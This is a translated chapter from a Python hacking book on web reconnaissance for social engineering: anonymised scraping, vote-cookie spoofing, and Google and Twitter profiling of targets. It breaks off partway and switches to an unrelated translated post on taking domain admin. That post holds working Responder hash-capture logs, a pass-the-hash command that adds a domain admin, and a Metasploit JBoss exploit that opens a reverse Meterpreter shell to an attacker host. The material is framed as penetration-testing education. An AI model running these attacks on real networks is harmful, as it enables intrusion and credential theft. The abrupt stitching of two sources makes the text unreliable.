2015年10月

连载介绍信息:http://zone.wooyun.org/content/23138

原作者:Chris Katsaropoulos

第一译者:@草帽小子-DJ

第二译者:crown丶prince

第六章:WEB侦查 本章内容:

1.使用Mechanize匿名浏览互联网

2.Python使用Beautiful Soup映射WEB元素

3.使用Python与Google交互

4.使用Python和Twitter交互

5.自动钓鱼

在我生命的八十七年中,我亲眼目睹了技术革命的演替。但却没有人完成了人的思考和需要这一问题。 —Bernard M. Baruch 美国第28到第32任总统的顾问

简介:今天的社会工程学 2010年,两个大规模的网络攻击改变了我们对网络战的理解。先前我们在第四章讨论过极光行动。在极光行动攻击中,瞄准了多个跨国的公司,雅虎,赛门铁克,Adobe等还有一些Google账户。华盛顿邮报报道这是一个新的有着先进水平的攻击。Stuxnet,第二次攻击,针对SCADA系统,特别是那些在伊朗的。网络维护者应该关注该蠕虫的发展,这是一个比极光行动更加先进和成熟的蠕虫攻击。尽管这两个网络攻击非常复杂,但他们有一个共同的关键点:他们的传播,至少部分是通过社会工程学传播的。不管多么复杂的和致命的网络攻击增加有效的社会工程学会增加攻击的有效性。在下面的章节中,我们将研究如何使用使用Python来实现自动化的社会工程学攻击。 在进行任何操作之前,攻击者应该有目标的详细信息,信息越多攻击的成功的机会越大。概念延伸到信息战争的世界。在这个邻域和当今时代,大部分所需的信息可以在互联网上找到,由于互联网庞大的规模,遗漏重要信息的可能性很高。为了防止信息丢失,计算机程序可以自动完成整个过程。Python是一个很好的执行自动化任务的工具,大量的第三方库允许我们轻松的和互联网,网站进行交互。

攻击之前的侦查 在本章中,我们通过程序对目标进行侦查。在这个发面关键是确保我们收集更多的信息量,而不被警惕性极高,能干的公司总部的网络管理员检测到。最后我们将看看如何汇总数据允许我们发动高度复杂的个性化的社会工程学攻击。确保在应用任何这些技术之前询问了执法官员和法律的意见。我们在这展示攻击和用过的工具是为了更好的理解他们的做法和知道如何在我们的生活中如何防范这种攻击。

使用Mechanize库浏览互联网 典型的计算机用户依赖WEB浏览器浏览网站和导航互联网。每一个站点都是不同的,可以包含图片,音乐和视频中的各种各样的组合。然而,浏览器实际上读取一个文本类型的文档,理解它,然后将他显示给用户,类似于一个Python程序的源文件和Python解释器的互动。用户可以使用浏览器访问站点或者使用不同的方法浏览他们的源代码。Linux下的我wget程序是个很受欢迎的方法。在Python中,浏览互联网的唯一途径是取回并下载一个网站的HTML源代码。有许多不同的库已经已经完成了处理WEB内容的任务。我们特别喜欢Mechanize,你在前几章已经用过。Mechanize:http://wwwsearch.sourceforge.net/mechanize/。 Mechanize主要的类Browser,允许任何可以在浏览器是上进行的操作。这个类也有其他的有用的方法是程序变得更简单。下面脚本演示了Mechanize最基本的使用:取回一个站点的源代码。这需要创建一个浏览器对象,然后调用open()函数。

import mechanizedef viewPage(url): browser = mechanize.Browser() page = browser.open(url) source_code = page.read() print(source_code) viewPage('http://www.syngress.com/')

运行这个脚本,我们看到它打印出www.syngress.com首页的HTML代码。

recon:∼# python viewPage.py <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Syngress.com - Syngress is a premier publisher of content in the Information Security field. We cover Digital Forensics, Hacking and Penetration Testing, Certification, IT Security and Administration, and more. </title> <meta name="description" content="" /><meta name="keywords" content="" /> <..SNIPPED..>

我们将使用mechanize.Browser类来构建脚本,在本章中浏览互联网。但是你不会受它的约束,Python提供了几个不同的方法浏览。这章使用Mechanize由于他提供了特殊的功能。John J. Lee设计的Mechanize提供可状态编程,简单的HTML表格和方便的解析和处理,例如HTTP-Equiv这样的命令和刷新。此外,它提供给你的内在对象是匿名的。这一切都会在下面的章节中用到。 匿名---增加代理,用户代理和Cookies 现在我们有从互联网获取网页内容的能力,退一步想想接下来的处理很有必要。我们的程序和在浏览器中打开一个网站没有什么不同,因此,我们应该采取同样的步骤在正常的浏览网页时建立匿名。网站查找唯一标识符来识别网页游客有几种不同的方法。第一种方法是通过记录请求的IP来确认用户。这可以通过使用虚拟专用网络(VPN)或者tor网络来缓和。一旦一个客户连接到VPN,然后,所有的将通过VPN自动处理。Python可以连接到代理服务器,给程序添加匿名功能。Mechanize的Browser类可以指定一个代理服务器属性。简单的设置浏览器代理是不够巧妙的。有很多的免费的代理网络,所以用户可以进去选择它们,通过它们的功能浏览。在这个例子中,我们选择http://www.hidemyass.com/的HTTP代理。在你读到这里的时候这个代理很有可能已经不工作了。所以去这个网站得到使用不同HTTP代理的细节。此外,McCurdy维护了一个很好的代理列表在网站:http://rmccurdy.com/scripts/proxy/good.txt。我们将测试我们的代理访问NOAA网站,它会友好的告诉你访问该网站时你的IP地址。

import mechanize def testProxy(url, proxy): browser = mechanize.Browser() browser.set_proxies(proxy) page = browser.open(url) source_code = page.read() print source_code url = 'http://ip.nefsc.noaa.gov/' hideMeProxy = {'http': '216.155.139.115:3128'} testProxy(url, hideMeProxy)

虽然识别HTML源代码有一点困难,我们看到该网站人为我们的IP地址是216.155.139.115,我们的代理,成功!我们继续构建脚本。

recon:∼# python proxyTest.py <html><head><title>What's My IP Address?</title></head> <..SNIPPED..> <b>Your IP address is...</b></font><br><font size=+2 face=arial color=red> 216.155.139.115</font><br><br><br><center> <font  size=+2face=arial color=white> <b>Your hostname appears to be...</b></ font><br><font size=+2 face=arial color=red> 216.155.139.115. choopa.net</font></font><font color=white <..SNIPPED..>

我们现在有一个简单的匿名浏览器。站点使用浏览器的user-agent字符串来识别唯一用户另一种方法。在正常情况下,user-agent字符串让网站知道关于浏览器的重要信息能制作HTML代码给用户更好的体验。然而,这些信息柏包含内核版本,浏览器版本,和其他关于用户的详细信息。恶意网站利用这些信息针对特定的浏览器进行精密的渗透利用,而其他网站利用这些信息来区分电脑是位与NAT网络还是私有网络。最近,一个丑闻被爆出,一个旅游网站利用user-agent字符串来检测MacBook用户并提供更昂贵的选择。 幸运的是,Mechanize改变user-agent字符串和改变代理一样简单。网站:http://www.useragentstring.com/pages/useragentstring.php为我们展示了一个巨大的有效的user-agent字符串名单供我们选择。我们将编写一个脚本来测试改变我们的user-agent字符串访问http://whatismyuseragent.dotdoh.com/来打印出我们的user-agent字符。

import mechanize def testUserAgent(url, userAgent): browser = mechanize.Browser() browser.addheaders = userAgent page = browser.open(url) source_code = page.read() print(source_code) url = 'http://whatismyuseragent.dotdoh.com/' userAgent = [('User-agent','Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')] testUserAgent(url, userAgent)

运行这个脚本,我们看到我们可以用虚假的user-agent字符串来访问页面。

recon:∼# python userAgentTest.py <html> <head> <title>Browser UserAgent Test</title> <style type="text/css"> <..SNIPPED..> <p><a href="http://www.dotdoh.com" target="_blank"><img src="logo. gif" alt="Logo" width="646" height="111" border="0"></a></p> <p><h4>Your browser's UserAgent string is: <span class="style1"><em>Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01</em></span></h4> </p> <..SNIPPED..>

最后,网站会返回一些包含独特标识的cookie给WEB浏览器允许网站识别重复的重复的访客。为了防止这一点,我们将执行其他函数从我们的WEB浏览器中清除cookie。另外一个Python标准库cookielib包含几个处理不同类型cookie的容器。这里使用的cookie类型包含储存各种不同的cookie到硬盘的功能。这个功能允许用户查看cookies而不必在初始化后返回给网站。让我们建立一个简单的脚本使用CookieJar来测试。我们将打开http://www.syngress.com页面作为我们的第一个例子。但现在我们打印浏览会话存储的cookie。

import mechanize import cookielib def printCookies(url): browser = mechanize.Browser() cookie_jar = cookielib.LWPCookieJar() browser.set_cookiejar(cookie_jar) page = browser.open(url) for cookie in cookie_jar: print(cookie) url = 'http://www.syngress.com/' printCookies(url)

运行这个脚本,我们可以看到来自网站的session id的cookie。

recon:∼# python printCookies.py <Cookie _syngress_session=BAh7CToNY3VydmVudHkiCHVzZDoJbGFzdCIAOg9zZYNzaW9uX2lkIiU1ZWFmNmIxMTQ5ZTQxMzUxZmE2ZDI1MSBlYTA4ZDUxOSIKZmxhc2hJQzonQWN0aW8uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--f80f741456f6c0dc82382bd8441b75a7a39f76c8 forwww.syngress.com/>

最终封装我们的代码为Python类 已经有了几个功能,将浏览器作为参数,修改它,偶尔添加一个额外的参数。如果将这些添加到一个类里面将很有用,这些功能可以归结为一个浏览器对象简单的调用,而不是导入我们的函数到某个文件使用笨拙的语法调用。我们我们这么做可以扩展Browser类,我们的新Browser类将会有我们已经创建过的函数,以及初始化的附加功能。这将有利于提高代码的可读性,并封装所有的功能在Browser类中直接处理。

 import mechanize, cookielib, random, time class anonBrowser(mechanize.Browser): def __init__(self, proxies = [], user_agents = []): mechanize.Browser.__init__(self) self.set_handle_robots(False) self.proxies = proxies self.user_agents = user_agents + ['Mozilla/4.0 ', 'FireFox/6.01','ExactSearch', 'Nokia7110/1.0'] self.cookie_jar = cookielib.LWPCookieJar() self.set_cookiejar(self.cookie_jar) self.anonymize() def clear_cookies(self): self.cookie_jar = cookielib.LWPCookieJar() self.set_cookiejar(self.cookie_jar) def change_user_agent(self): index = random.randrange(0, len(self.user_agents)) self.addheaders = [('User-agent', (self.user_agents[index]))] def change_proxy(self): if self.proxies: index = random.randrange(0, len(self.proxies)) self.set_proxies({'http': self.proxies[index]}) def anonymize(self, sleep = False): self.clear_cookies() self.change_user_agent() self.change_proxy() if sleep: time.sleep(60)

我们的新类有一个默认的user-agents列表,接受列表添加进去,以及用户想使用的代理服务器列表。它还具有我们先前创建的三个功能,可以单独也可以同时使用匿名函数。最后,anonymize提供等待60秒的选项,增加在服务器日志请求访问之间的时间。同时也不改变提供的信息,该额外的步骤减小了被识别为相同的源地址的机会。增加时间和模糊的通过安全是一个道理,但是额外的措施是有帮助的,时间通常不是一个问题。另一个程序可以以相同的方式使用这个新类。文件anonBrowser.py包含新类,如果想在导入调用是看到它,我们必须将它保存在脚本的目录。 让我们编写我们的脚本,导入我们的新类。我有一个教授曾将帮助他四岁的女儿在线投票竞争小猫冠军。由于投票是在会话的基础上的,每个游客的票需要是唯一的。我们来看看是否我们能欺骗这个网站给予我们每次访问唯一的cookie。我们将匿名访问该网站四次。

from anonBrowser import * ab = anonBrowser(proxies=[],user_agents=[('User-agent','superSecretBroswer')]) for attempt in range(1, 5): ab.anonymize() print('[*] Fetching page') response = ab.open('http://kittenwar.com') for cookie in ab.cookie_jar: print(cookie)

运行该脚本,我们看到页面获得五次不同时间不同cookie的访问。成功!随着我们匿名访问类的建立,让我们抹去我们访问网站上的私人信息。

recon:∼# python kittenTest.py [*] Fetching page <Cookie PHPSESSID=qg3fbia0t7ue3dnen5i8brem61 for kittenwar.com/> [*] Fetching page <Cookie PHPSESSID=25s8apnvejkakdjtd67ctonfl0 for kittenwar.com/> [*] Fetching page <Cookie PHPSESSID=16srf8kscgb2l2e2fknoqf4nh2 for kittenwar.com/> [*] Fetching page <Cookie PHPSESSID=73uhg6glqge9p2vpk0gt3d4ju3 for kittenwar.com/>

用匿名类抹去WEB页面 现在我们可以用Python取回WEB内容。可以开始侦查目标了。我们可以通过检索大型的网站来开始我们的研究了。攻击者可以深入的调查目标的主页面寻找隐藏的和有价值的数据。然而这种搜索行动会产生大量的页面浏览器。移动网站的内容到本地能减少页面的浏览数。我们可以只访问页面一次,然后研究无数次。有一些框架可以这样做,但是我们将建立我们自己的,利用先前的anonBrowser类。让我们利用anonBrowser类检索目标网站所有的链接吧。 用Beautiful Soup解析Href链接 为了从目标网站解析链接,我们有两个选择:(1)利用正则表达式来搜索和替换HTML代码。(2)使用强大的第三方库BeautifulSoup,可以在下面网站下载安装:http://www.crummy.com/software/BeautifulSoup/。BeautifulSoup的创造者构建了这个极好的库来处理和解析HTML代码和XML。首先,我们看看怎样使用两种方法找到链接,然后解释为什么大多数情况下BeautifulSoup是很好的选择。

 # coding=UTF-8 from anonBrowser import * from BeautifulSoup import BeautifulSoup import optparse import re def printLinks(url): ab = anonBrowser() ab.anonymize() page = ab.open(url) html = page.read() try: print '[+] Printing Links From Regex.' link_finder = re.compile('href="(.*?)"') links = link_finder.findall(html) for link in links: print link except: pass try: print '\n[+] Printing Links From BeautifulSoup.' soup = BeautifulSoup(html) links = soup.findAll(name='a') for link in links: if link.has_key('href'): print link['href'] except: pass def main(): parser = optparse.OptionParser('usage%prog -u <target url>') parser.add_option('-u', dest='tgtURL', type='string', help='specify target url') (options, args) = parser.parse_args() url = options.tgtURL if url == None: print parser.usage exit(0) else: printLinks(url) if __name__ == '__main__': main()

运行我们的脚本,让我们来解析来自流行网站的链接,我们的脚本产生链接的结果通过正则表达式和BeautifulSoup解析。

recon:# python linkParser.py -uhttp://www.hampsterdance.com/ [+] Printing Links From Regex. styles.css http://Kunaki.com/Sales.asp?PID=PX00ZBMUHD http://Kunaki.com/Sales.asp?PID=PX00ZBMUHD Freshhampstertracks.htm freshhampstertracks.htm freshhampstertracks.htm http://twitter.com/hampsterrific http://twitter.com/hampsterrific https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 funnfree.htm https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 meetngreet.htm http://www.asburyarts.com index.htm meetngreet.htm musicmerch.htm funnfree.htm freshhampstertracks.htm hampsterclassics.htm http://www.statcounter.com/joomla/ [+] Printing Links From BeautifulSoup. http://Kunaki.com/Sales.asp?PID=PX00ZBMUHD http://Kunaki.com/Sales.asp?PID=PX00ZBMUHD freshhampstertracks.htm freshhampstertracks.htm freshhampstertracks.htm http://twitter.com/hampsterrific http://twitter.com/hampsterrific https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 funnfree.htm https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 meetngreet.htm http://www.asburyarts.com http://www.statcounter.com/joomla/

乍一看两个似乎差不多。然而,使用正则表达式和BeautifulSoup产生了不同的结果,与一个特定的数据块相关联的标签变化不大,造成程序更加顽固的是网站管理员的念头。比如,我们的正则表达式包含CSS作为一个link,显然,这不是一个链接,但他被正则表达式匹配了。BeautifulSoup解析时知道忽略它,不包含。 用Beautiful Soup下载图片 除了网页上面的链接,它上面的图片可能会有用。在第三章,我们展示了如何从图像中提取元数据。再一次,BeautifulSoup成为了关键,允许在任何HTML中搜索’img‘标签。浏览器对象下载图片保存在本地硬盘,代码的变化只是将链接变为图像。随着这些变化,我们基本的检索器已经变得足够强大到找到网页的链接和下载图像。

 # coding=UTF-8 from anonBrowser import * from BeautifulSoup import BeautifulSoup import os import optparse def mirrorImages(url, dir): ab = anonBrowser() ab.anonymize() html = ab.open(url) soup = BeautifulSoup(html) image_tags = soup.findAll('img') for image in image_tags: filename = image['src'].lstrip('http://') filename = os.path.join(dir, filename.replace('/', '_')) print('[+] Saving ' + str(filename)) data = ab.open(image['src']).read() ab.back() save = open(filename, 'wb') save.write(data) save.close() def main(): parser = optparse.OptionParser('usage%prog -u <target url> -d <destination directory>') parser.add_option('-u', dest='tgtURL', type='string', help='specify target url') parser.add_option('-d', dest='dir', type='string', help='specify destination directory') (options, args) = parser.parse_args() url = options.tgtURL dir = options.dir if url == None or dir == None: print parser.usage exit(0) else: try: mirrorImages(url, dir) except Exception, e: print('[-] Error Mirroring Images.') print('[-] ' + str(e)) if __name__ == '__main__': main()

运行这个脚本,我们看到它成功的下载了网站的所有图像。 econ:∼# python imageMirror.py -u http://xkcd.com -d /tmp/ [+] Saving /tmp/imgs.xkcd.com_static_terrible_small_logo.png [+] Saving /tmp/imgs.xkcd.com_comics_moon_landing.png [+] Saving /tmp/imgs.xkcd.com_s_a899e84.jpg 研究,调查,发现 在大多数现代社会工程学的尝试中,攻击者的目标从公司或者企业开始。对于Stuxnet的肇事者,是一个有权限进入SCADA系统的伊朗人。极光行动背后的人是通过调查公司的人员而获取对重要地点的访问权的。让我们假设,我们有一个有趣的公司并知道背后一个主要人物,一个通常的攻击者可能会有比这个更少的信息。攻击者往往只有攻击者更宏观的知识,他们需要利用互联网和其他资源深入了解个人。从Oracle,Google等所有的,我们利用接下来的一系列的脚本。 用Python和Google API交互 想象一下,一个朋友问你一个隐晦的问题,他们错误的以为你知道些什么。你怎么回答?Google一下。所以,我们如何了解目标公司的更多信息了?好的,答案再次是Google。Google提供了应用程序接口API允许程序员进行查询并得到结果,而不必尝试破解正常的Google界面。目前有两套API,老旧的API和API,这些需要开发者密钥。要求独一无二的开发者密钥让匿名变得不可能,一些我们以努力获得成功的脚本将不能用。幸运的是老旧的版本任然允许一天之中进行一系列的查询,大约每天30次搜索结果。用于收集信息的话30次结果足够了解一个组织网站的信息了。我们将建立我们的查询功能,返回攻击者感兴趣的信息。

import urllib from anonBrowser import * def google(search_term): ab = anonBrowser() search_term = urllib.quote_plus(search_term) response = ab.open('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=' + search_term) print(response.read()) google('Boondock Saint') 从Google返回的内容和下面的类似。 {"responseData": {"results":[{"GsearchResultClass":"GwebSearch", "unescapedUrl":"http://www.boondocksaints.com/","url":"http:// www.boondocksaints.com/","visibleUrl":"www.boondocksaints. com","cacheUrl":"http://www.google.com/search?q\ u003dcache:J3XW0wgXgn4J:www.boondocksaints.com","title":"The \ u003cb\u003eBoondock Saints\u003c/b\u003e","titleNoFormatting":"The Boondock <..SNIPPED..> \u003cb\u003e...\u003c/b\u003e"}],"cursor":{"resultCount":"62,800", "pages":[{"start":"0","label":1},{"start":"4","label":2},{"start ":"8","label":3},{"start":"12","label":4},{"start":"16","label": 5},{"start":"20","label":6},{"start":"24","label":7},{"start":"2 8","label":8}],"estimatedResultCount":"62800","currentPageIndex" :0,"moreResultsUrl":"http://www.google.com/search?oe\u003dutf8\ u0026ie\u003dutf8\u0026source\u003duds\u0026start\u003d0\u0026hl\ u003den\u0026q\u003dBoondock+Saint","searchResultTime":"0.16"}}, "responseDetails": null, "responseStatus": 200} quote_plus()

函数是这个脚本中的新的代码块。URL编码是指非字母数字的字符被转换然后发送到服务器。虽然不是完美的URL编码,但是适合我们的目的。最后打印Google的响应显示:一个长字符串的括号和引号。如果你仔细观察,会发现响应的内容看起来很像字典。这些响应是json格式的,和字典非常相似,不出所料,Python有库可以构建和处理json字符串。让我们添加这个功能重新审视这个响应。

 import urllib, json from anonBrowser import * def google(search_term): ab = anonBrowser() search_term = urllib.quote_plus(search_term) response = ab.open('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=' + search_term) objects = json.load(response print(response.read()) google('Boondock Saint')

当我们打印对象时,看起来非常像第一次函数的响应.json库加载响应到一个字典,让这些字段更容易理解,而不需要手动的解析字符串。

 {u'responseData': {u'cursor': {u'moreResultsUrl': u'http://www.google. com/search?oe=utf8&ie=utf8&source=uds&start=0&hl=en&q=Boondock +Saint', u'estimatedResultCount': u'62800', u'searchResultTime': u'0.16', u'resultCount': u'62,800', u'pages': [{u'start': u'0', u'label': 1}, {u'start': u'4', u'label': 2}, {u'start': u'8', u'label': 3}, {u'start': u'12', u'label': 4}, {u'start': u'16', u'label': 5}, {u'start': u'20', u'label': 6}, {u'start': u'24', u'label': 7}, {u'start': u'28', u..SNIPPED..> Saints</b> - Wikipedia, the free encyclopedia', u'url': u'http:// en.wikipedia.org/wiki/The_Boondock_Saints', u'cacheUrl': u'http:// www.google.com/search?q=cache:BKaGPxznRLYJ:en.wikipedia.org', u'unescapedUrl': u'http://en.wikipedia.org/wiki/The_Boondock_ Saints', u'content': u'The <b>Boondock Saints</b> is a 1999 American action film written and directed by Troy Duffy. The film stars Sean Patrick Flanery and Norman Reedus as Irish fraternal <b>...</b>'}]}, u'responseDetails': None, u'responseStatus': 200}

现在我们可以考虑在一个给定的Google搜索的结果里什么事是重要的。显然,页面返回的链接很重要。此外,页面的标题和Google用的小的文本断对理解链接指向哪里也很重要。为了组织这些结果,我们创建了一个类来保存结果。这将是访问不同的信息更容易。

 # coding=UTF-8 import json import urllib import optparse from anonBrowser import * class Google_Result: def __init__(self,title,text,url): self.title = title self.text = text self.url = url def __repr__(self): return self.title def google(search_term): ab = anonBrowser() search_term = urllib.quote_plus(search_term) response = ab.open('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=' + search_term) objects = json.load(response) results = [] for result in objects['responseData']['results']: url = result['url'] title = result['titleNoFormatting'] text = result['content'] new_gr = Google_Result(title, text, url) results.append(new_gr) return result def main(): parser = optparse.OptionParser('usage%prog -k <keywords>') parser.add_option('-k', dest='keyword', type='string', help='specify google keyword') (options, args) = parser.parse_args() keyword = options.keyword if options.keyword == None: print(parser.usage) exit(0) else: results = google(keyword) print(results) if __name__ == '__main__': main()

这种更简洁的呈现数据的方式产生以下输出:

recon:∼# python anonGoogle.py -k 'Boondock Saint' [The Boondock Saints, The Boondock Saints (1999) - IMDb, The Boondock Saints II: All Saints Day (2009) - IMDb, The Boondock Saints - Wikipedia, the free encyclopedia]

用Python解析Tweets 在这一点上,我们的脚本已经自动的收集了一些我们的目标的信息。在我们的下一系列的步骤中,我们将撤离域和组织,开始在网上寻找可用的个人信息。 像Google,Twitter给开发者提供了API,该文档在https://dev.twitter.com/docs,非常深入,提供了更多特点的访问,但在本程序中用不到。 让我们探究以下如何从Twitter检索数据。具体来说,我们要转发美国爱国者黑客th3j35t3r的微博,他把Boondock Saint作为自己的昵称。我们将构建reconPerson()类然后输入th3j35t3r作为Twitter的搜索关键字。

# coding=UTF-8 import json import urllib from anonBrowser import * class reconPerson: def __init__(self,first_name,last_name, job='',social_media={}): self.first_name = first_name self.last_name = last_name self.job = job self.social_media = social_media def __repr__(self): return self.first_name + ' ' + self.last_name + ' has job ' + self.job def get_social(self, media_name): if self.social_media.has_key(media_name): return self.social_media[media_name] return None def query_twitter(self, query): query = urllib.quote_plus(query) results = [] browser = anonBrowser() response = browser.open('http://search.twitter.com/search.json?q='+ query) json_objects = json.load(response) for result in json_objects['results']: new_result = {} new_result['from_user'] = result['from_user_name'] new_result['geo'] = result['geo'] new_result['tweet'] = result['text'] results.append(new_result) return results ap = reconPerson('Boondock', 'Saint') print ap.query_twitter('from:th3j35t3r since:2010-01-01 include:retweets')

当进一步的继续检索Twitter,我们已经看到了打来那个的信息,这可能对爱国者黑客有用。他正在和一些黑客团体UGNazi的支持者起冲突。好奇心驱使我们想知道为什么会变成这样。

recon:∼# python twitterRecon.py [{'tweet': u'RT @XNineDesigns: @th3j35t3r Do NOT give up. You are the bastion so many of us need. Stay Frosty!!!!!!!!', 'geo': None, 'from_user': u'p\u01ddz\u0131uod\u0250\u01dd\u028d \u029e\ u0254opuooq'}, {'tweet': u'RT @droogie1xp: "Do you expect me to talk?" - #UGNazi "No #UGNazi I expect you to die." @th3j35t3r #ticktock', 'geo': None, 'from_user': u'p\u01ddz\u0131uod\u0250\ u01dd\u028d \u029e\u0254opuooq'}, {'tweet': u'RT @Tehvar: @th3j35t3r my thesis paper for my masters will now be focused on supporting the #wwp, while I can not donate money I can give intelligence.' <..SNIPPED..>

我希望,你看到这个代码的时候在想“我现在知道该怎么做了!”确实是这样,从互联网上检索一些特定模式的信息之后。显然,使用Twitter的结果没有用,使用他们寻找目标的信息。当谈论获取个人信息时社交平台是一个金矿。个人的生日,家乡甚至家庭地址,电话号码等隐秘的信息都会被给予不怀好意的人。人们往往没有意识到这个问题,使用社交网站是不安全的习惯。让我们进一步的探究从Twitter的提交里面提取位置数据。

得到内网域管理员的5种常见方法

from:http://blog.spiderlabs.com/2013/09/top-five-ways-spiderlabs-got-domain-admin-on-your-internal-network.html

spiderlabs总结的,我简单翻译下,偶尔加点我的牢骚。

1.Netbios and LLMNR Name Poisoning

这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html),但实际测试还是Responder比较好,都是套用标准库写的,很方便在目标上使用:)
~/Responder# python Responder.py -i 192.168.8.25 NBT Name Service/LLMNR Answerer 1.0. Please send bugs/comments to: lgaffie@trustwave.com To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started Global Parameters set: Challenge set is: 1122334455667788 WPAD Proxy Server is:OFF HTTP Server is:ON HTTPS Server is:ON SMB Server is:ON SMB LM support is set to:0 SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:OFF LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad. LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad. LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110. …snip… NBT-NS Answer sent to: 192.168.8.6 [+]SMB-NTLMv2 hash captured from : 192.168.8.6 Domain is : BEACONHILLSHIGH User is : smccall [+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash Share requested: \\ECONOMY309\IPC$ …snip... LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad. [+]SMB-NTLMv2 hash captured from : 192.168.8.11 Domain is : BEACONHILLSHIGH User is : lmartin [+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghash Share requested: \\ADVCHEM\311IPC$ …snip…
这里的LM, NTLMv1, or NTLMv2哈希,能够用GPU或者彩虹表暴力破解.如果在responder会话过程中,抓到一个域管理员帐号,能够直接使用winexe运行cmd.exe命令
~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully. C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully.
2.利用jboss漏洞

可以前期先用nmap扫描下端口,识别出常见的JAVA应用服务器,后期配合Metasploit的auxiliary模块来利用.比如jboss漏洞.最常见的就是弱口令了吧,同理的,也可以寻找webloigc,websphere,tomcat等这些基于JAVA的应用服务器,还有最近国内政府部门部署比较多的Apusic,不过需要注意war包格式,进后台,直接部署WAR就行了.jboss的除了弱口令,还有个后台绕过,和流传很久的1337那个.用例说下如何用metasploit暴力破解jboss后台,以及部署war包.
msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080 ~/work/nmap# cat http.jboss.8080 < -- 这个是开25线程字典跑8080端口jboss后台的 [*] Initializing modules... THREADS => 25 RHOSTS => file:./8080 DICTIONARY => ./http.scan.list RPORT => 8080 [*] Detecting error code [*] Detecting error code [*] Detecting error code [*] Detecting error code [*] Using code '404' as not found for 192.168.5.18 [*] Using code '404' as not found for 192.168.5.21 [*] Using code '404' as not found for 192.168.5.20 [*] Found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20) [*] http://192.168.5.20:8080/web-console/ requires authentication: Basic realm="JBoss JMX Console" [*] Found http://192.168.5.20:8080/web-console/ 404 (192.168.5.20) [*] Found http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20) [*] http://192.168.5.20:8080/jmx-console/ requires authentication: Basic realm="JBoss JMX Console" [*] Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21) [*] Scanned 4 of 4 hosts (100% complete) [*] Auxiliary module execution completed
Output from use auxiliary/scanner/http/jboss_vulnscan: [*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console" [*] 192.168.5.20:8080 Check for verb tampering (HEAD) [+] 192.168.5.20:8080 Got authentication bypass via HTTP verb tampering [+] 192.168.5.20:8080 Authenticated using admin:admin [+] 192.168.5.20:8080 /status does not require authentication (200) [+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200) [+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200) [+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200) Output from use exploit/multi/http/jboss_maindeployer: < --部署war包 msf exploit(jboss_maindeployer) > exploit [*] Started reverse handler on 192.168.5.233:4444 [*] Sorry, automatic target detection doesn't work with HEAD requests [*] Automatically selected target "Java Universal" [*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war ... [*] Using URL: http:// 192.168.5.233:1337/HlveuqEzrovXH.war [*] Asking the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war [*] Sending the WAR archive to the server... [*] Sending the WAR archive to the server... [*] Waiting for the server to request the WAR archive.... [*] Shutting down the web service... [*] Executing HlusdqEcokvXH... [+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp' [*] Undeploying HlusdqEcokvXH... [*] Sending stage (30355 bytes) to 192.168.5.159 [*] Meterpreter session 1 opened (192.168.5.233:4444 -> 192.168.5.20:4209) at 2013-09-15 19:00:06 -0600 meterpreter > sysinfo Computer : BHHSMOFF011 OS : Windows 2003 5.2 (x86) Meterpreter : java/java meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\DELLBAC\EJBContainer\bin>whoami whoami beaconhillshigh\backup_admin 